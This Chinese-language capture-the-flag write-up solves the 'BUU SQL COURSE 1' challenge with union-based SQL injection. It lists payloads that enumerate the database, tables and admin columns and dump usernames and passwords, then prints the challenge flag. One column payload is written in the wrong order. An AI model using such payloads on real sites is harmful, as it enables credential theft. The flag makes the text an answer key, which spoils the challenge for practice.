1.BUU SQL COURSE 1
题目网址:
简单汇总:
数据库名称和用户名称 | /backend/content_detail.php?id=-1 union select database(),user() |
查询admin里的值 | php?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='news' |
暴出字段 | php?id=-1 union select 1,group_concat(column_name) information_schema.columns from new where table_name='admin' |
暴出密码 | php?id=-1 union select 1,group_concat(username,password) from news.admin |
打开网址,发现是一个这样的网站,这里题目很明确提示了是SQL注入类型,于是就看它传递的参数包,如下:
发现在点开三个测试新闻发现传递的1数据包都存在SQL注入,于是修改参数执行SQL注入:
发现在修改参数时页面回显的参数不一样,进一步证明存在。于是利用order by进行字段查看,发现到3就没有回显。于是可以进行暴库等操作:
- /backend/content_detail.php?id=-1 union select database(),user()
------得到数据库名称和用户名称
通过查询名为news的数据库得到两个表:
- php?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='news'
------显而易见要查询admin里的值
暴字段:
php?id=-1 union select 1,group_concat(column_name) information_schema.columns from new where table_name='admin'
暴出密码:
- php?id=-1 union select 1,group_concat(username,password) from admin
然后用暴出的username和password可以尝试登录:
成功得到flag!
flag{e827fcd6-7a4f-4d80-a9a5-4bd3203c963c}